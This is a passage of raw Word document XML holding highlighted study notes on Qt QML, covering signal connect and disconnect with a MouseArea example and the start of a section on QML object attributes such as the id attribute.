          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for removing connected signals:</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Rectangle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id: relay</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function removeTelegraphSignal()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t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>relay.messageReceived.disconnect(sendToTelegraph)</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00EA1A01" w:rsidRDefault="00D77D11" w:rsidP="00EA1A01">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2438" w:name="signal-to-signal-connect"/>
      <w:bookmarkEnd w:id="2438"/>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Signal to Signal Connect</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By connecting signals to other signals, the connect() method can form different signal chains.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00C10CB8" w:rsidRDefault="00D77D11" w:rsidP="00EA1A01">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00C10CB8" w:rsidRDefault="00D77D11" w:rsidP="00EA1A01">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    id: forwarder</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width: 100; height: 100</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signal send()</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onSend: console.log("Send clicked")</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MouseArea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id: mousearea</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anchors.fill: parent</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onClicked: console.log("MouseArea clicked")</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Component.onCompleted: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mousearea.clicked.connect(send)</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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00EA1A01" w:rsidRDefault="00D77D11" w:rsidP="00EA1A01">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRPr="00D77D11" w:rsidRDefault="00D77D11" w:rsidP="00D77D11">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Whenever the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2708" w:history="1">
        <w:r w:rsidRPr="00D77D11">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77D11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> clicked signal is emitted, the send signal will automatically be emitted as well.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRDefault="00EA1A01" w:rsidP="00D77D11">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRDefault="00490E7E" w:rsidP="00D77D11">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2709" w:anchor="signal-attributes" w:history="1">
        <w:r w:rsidR="00EA1A01" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html#signal-attributes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00490E7E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2439" w:name="_Toc483001060"/>
      <w:bookmarkStart w:id="2440" w:name="_Toc483004049"/>
      <w:bookmarkStart w:id="2441" w:name="_Toc483604395"/>
      <w:bookmarkStart w:id="2442" w:name="_Toc483605615"/>
      <w:r w:rsidRPr="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML Object Attributes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2439"/>
      <w:bookmarkEnd w:id="2440"/>
      <w:bookmarkEnd w:id="2441"/>
      <w:bookmarkEnd w:id="2442"/>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A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Every</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> QML object type </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>has a defined set of attributes</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an object type is </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>created with the set of attributes</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that have been defined for that object type. There are </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>several different kinds</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of attributes which can be specified, which are described below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00490E7E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2443" w:name="attributes-in-object-declarations"/>
      <w:bookmarkStart w:id="2444" w:name="_Toc483001061"/>
      <w:bookmarkStart w:id="2445" w:name="_Toc483004050"/>
      <w:bookmarkStart w:id="2446" w:name="_Toc483604396"/>
      <w:bookmarkStart w:id="2447" w:name="_Toc483605616"/>
      <w:bookmarkEnd w:id="2443"/>
      <w:r w:rsidRPr="00490E7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Attributes in Object Declarations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2444"/>
      <w:bookmarkEnd w:id="2445"/>
      <w:bookmarkEnd w:id="2446"/>
      <w:bookmarkEnd w:id="2447"/>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An</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2710" w:anchor="object-declarations" w:history="1">
        <w:r w:rsidRPr="00A0333A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>object declaration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in a QML document defines a new type</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It also </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>declares an object hierarchy that will be instantiated</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> should an instance of that newly defined type be created.</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The set of QML object-type attribute types is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attribute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00A0333A" w:rsidRDefault="00EA1A01" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="120" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>property attributes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00A0333A" w:rsidRDefault="00EA1A01" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="120" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>signal attributes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00A0333A" w:rsidRDefault="00EA1A01" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="120" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>signal handler attributes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00A0333A" w:rsidRDefault="00EA1A01" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="120" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>method attributes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="120" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached properties and attached signal</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> handler attributes</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These attributes are discussed in detail below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00EA1A01">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2448" w:name="the-id-attribute"/>
      <w:bookmarkStart w:id="2449" w:name="_Toc483001062"/>
      <w:bookmarkStart w:id="2450" w:name="_Toc483004051"/>
      <w:bookmarkStart w:id="2451" w:name="_Toc483604397"/>
      <w:bookmarkStart w:id="2452" w:name="_Toc483605617"/>
      <w:bookmarkEnd w:id="2448"/>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attribute</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2449"/>
      <w:bookmarkEnd w:id="2450"/>
      <w:bookmarkEnd w:id="2451"/>
      <w:bookmarkEnd w:id="2452"/>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Every QML object type has </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exactly one</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attribute</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This attribute is </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provided by the language itself</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cannot be redefined or overridden</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by any QML object type.</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A value may be assigned to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">attribute of an object instance to allow that object to be </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identified and referred to by other objects</w:t>
      </w:r>
